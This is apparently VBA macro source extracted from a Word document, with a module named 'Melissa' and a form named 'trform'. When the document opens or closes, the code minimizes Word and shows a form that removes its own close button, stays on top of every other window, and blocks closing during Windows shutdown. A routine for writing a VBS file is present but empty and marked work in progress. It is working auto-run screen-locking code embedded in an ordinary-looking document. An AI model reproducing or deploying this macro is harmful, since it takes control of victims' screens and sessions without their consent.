Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Application.WindowState = wdWindowStateMinimize
trform.Show
End Sub

Private Sub Document_Open()
Application.WindowState = wdWindowStateMinimize
trform.Show
End Sub
Attribute VB_Name = "trform"
Attribute VB_Base = "0{88422FA1-3644-4D84-B553-273C6F4DC07B}{95317158-C5AC-4B73-A4D6-4D1FDE89554B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Const mcGWL_STYLE = (-16)
Private Const mcWS_SYSMENU = &H80000
Private Const WM_QUERYENDSESSION As Integer = &H11
Private Const WM_CANCELMODE As Integer = &H1F
Private Const SWP_NOSIZE = &H1
Private Const SWP_NOMOVE = &H2
Private Const HWND_TOPMOST = -1

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal uFlags As Long) As Long

Private Sub createvbs()
' W.I.P.
End Sub

Private Sub deathsub()
antikill
atop Me.caption
createvbs
End Sub

Private Sub UserForm_Activate()
deathsub
End Sub

Private Sub UserForm_Initialize()
deathsub
End Sub

Private Sub antikill()
noclose Me
End Sub

Private Sub noclose(frm As Object)
Dim lngStyle As Long
Dim lngHWnd As Long

lngHWnd = FindWindow(vbNullString, frm.caption)
lngStyle = GetWindowLong(lngHWnd, mcGWL_STYLE)

If lngStyle And mcWS_SYSMENU > 0 Then
SetWindowLong lngHWnd, mcGWL_STYLE, (lngStyle And Not mcWS_SYSMENU)
End If

End Sub

Private Sub atop(caption As String)

Dim ret As Long
Dim hWnd As Long

hWnd = FindWindow(vbNullString, caption)
ret = SetWindowPos(hWnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE Or SWP_NOSIZE)

End Sub

Private Sub UserForm_QueryClose(Cancel As Integer, CloseMode As Integer)
If CloseMode = vbAppWindows Then Cancel = True
End Sub


INQUEST-PP=macro
